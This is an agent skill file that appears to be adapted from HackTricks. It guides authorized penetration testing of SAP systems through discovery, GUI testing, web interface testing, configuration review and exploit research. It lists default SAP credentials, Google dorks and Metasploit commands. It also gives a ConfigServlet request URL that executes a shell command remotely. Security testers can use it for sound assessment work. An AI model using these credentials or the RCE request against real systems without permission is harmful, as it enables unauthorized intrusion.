Hacktricks-skills sap-pentesting

How to perform authorized penetration testing on SAP systems. Use this skill whenever the user mentions SAP security testing, SAP penetration testing, SAP vulnerability assessment, SAP GUI testing, SAP web interface testing, SAP configuration review, or needs to assess SAP system security. This includes discovery, credential testing, configuration parameter analysis, and exploit research for SAP environments.

install

source · Clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

manifest: skills/network-services-pentesting/pentesting-sap/SKILL.MD

source content

SAP Penetration Testing Skill

A comprehensive guide for authorized security assessment of SAP systems.

⚠️ Authorization Required

Only use this skill for authorized security testing. Ensure you have written permission before testing any SAP system. Unauthorized access to SAP systems is illegal and can result in severe legal consequences.

Overview

SAP (Systems Applications and Products in Data Processing) is an ERP software with three layers: database, application, and presentation. Each SAP instance (SID) typically has four environments: dev, test, QA, and production. The most effective attacks target the database layer.

Each SAP instance is divided into clients. The

SAP*

user is the application's equivalent of "root" with default password

06071992

(often unchanged in test/dev environments).

Phase 1: Discovery

OSINT and Reconnaissance

Check application scope - Note hostnames and system instances for SAP GUI connections

Use OSINT tools:

Shodan queries:
```
sap portal
```
,
```
SAP Netweaver
```
,
```
SAP J2EE Engine
```

Google Dorks:

inurl:50000/irj/portal
inurl:IciEventService/IciEventConf
inurl:/wsnavigator/jsps/test.jsp
inurl:/irj/go/km/docs/

Port scanning with nmap:
- Check for SAP routers, webdnypro, web services, web servers
- Common SAP ports: 50000 (ICM), 3200-3299 (SAP instances)
Directory fuzzing (if web server present):
- Use Burp Intruder with SecLists wordlists:
  - ```
  urls_SAP.txt
```
- ```
SAP.fuzz.txt
```
  - ```
  sap.txt
```

Metasploit service discovery:

msf > use auxiliary/scanner/sap/sap_service_discovery
msf > set RHOSTS <target>
msf > set INSTANCES 00-99
msf > run

Phase 2: SAP GUI Testing

Connection

Connect using:

sapgui <sap_server_hostname> <system_number>

Default Credentials Testing

Test these common default credentials (P1 severity if found in production):

User	Password	Client	Notes
SAP*	06071992	*	Hardcoded kernel user
SAP*	PASS	*	Alternative default
DDIC	19920706	000,001	Has SAP_ALL
IDEADM	admin	*	IDES systems only
EARLYWATCH	SUPPORT	066	High privileges
TMSADM	PASSWORD	000	Medium privileges
TMSADM	$1Pawd2&	000	Alternative
SAPCPIC	ADMIN	000,001	Medium privileges
SOLMAN_ADMIN	init1234	*	SOLMAN systems
SAPSUPPORT	init1234	*	SOLMAN/satellite

Trial/Developer Edition Credentials:

DDIC/SAP*/DEVELOPER/BWDEVELOPER:
```
DidNPLpw2014
```
,
```
Appl1ance
```
,
```
Down1oad
```

Post-Authentication Checks

Capture credentials - Run Wireshark during authentication (some clients transmit without SSL)
Check privilege escalation via transaction codes:
- ```
SU01
```
  - Create/maintain users
- ```
SU01D
```
  - Display users
- ```
SU10
```
  - Mass maintenance
- ```
SU02
```
  - Manual profile creation
- ```
SM19
```
  - Security audit configuration
- ```
SE84
```
  - Authorization information system
Test command execution - Check if you can run system commands/scripts
Test XSS - Check BAPI Explorer for XSS vulnerabilities

Phase 3: Web Interface Testing

Common Endpoints

```
http://SAP:50000/irj/portal
```
- SAP Logon screen
```
http://SAP:50000/index.html
```
- Index page
```
http://SAP:50000/startPage
```
- Start page

http://SAP:50000/webdynpro/resources/sap.com/XXX/JWFTestAddAssignees#

- User enumeration

```
/irj/go/km/navigation/
```
- Directory listing/auth bypass
```
http://SAP/sap/public/info
```
- System information disclosure

Vulnerability Checks

OWASP Top 10 - Test for XSS, RCE, XXE, SQL injection
Auth bypass - Try verb tampering
HTTP credentials - Check if credentials submitted over HTTP (P3 severity)
Information disclosure - Check
```
/sap/public/info
```
for system details

Example: ConfigServlet RCE

http://example.com:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=uname -a

Phase 4: Configuration Parameter Review

Manual Checking (Transaction RSPFPAR)

Query parameters and check for insecure values:

Parameter	Insecure Value	Risk
`auth/object_disabling_active`	Y	Object disabling active
`auth/rfc_authority_check`	<2	Weak RFC authority check
`auth/no_check_in_some_cases`	Y	Checks bypassed
`bdc/bdel_auth_check`	FALSE	BDC auth not enforced
`gw/reg_no_conn_info`	<255	Connection info limit
`icm/security_log`	2	Security log level
`login/password_compliance_to_current_policy`	0	No password policy
`login/no_automatic_user_sapstar`	0	SAPSTAR auto-assignment
`login/min_password_lng`	<8	Short passwords allowed
`login/fails_to_user_lock`	<5	Weak lockout policy
`login/password_expiration_time`	>90	Long password lifetime
`snc/enable`	0	SNC disabled
`rsau/enable`	0	RS AU checks disabled

Automated Checking

Use SAP Parameter Validator (SAPPV):

./SAPPV.sh EXPORT.XML

Phase 5: Exploitation Research

Metasploit Modules

Search and use relevant modules:

msf > search sap

Key modules:

auxiliary/scanner/sap/sap_service_discovery

- Service enumeration

auxiliary/scanner/sap/sap_icf_public_info

- Info gathering

```
auxiliary/scanner/sap/sap_soap_rfc_ping
```
- Service discovery

exploit/multi/sap/sap_soap_rfc_sxpg_call_system_exec

- RCE

exploit/windows/http/sap_configservlet_exec_noauth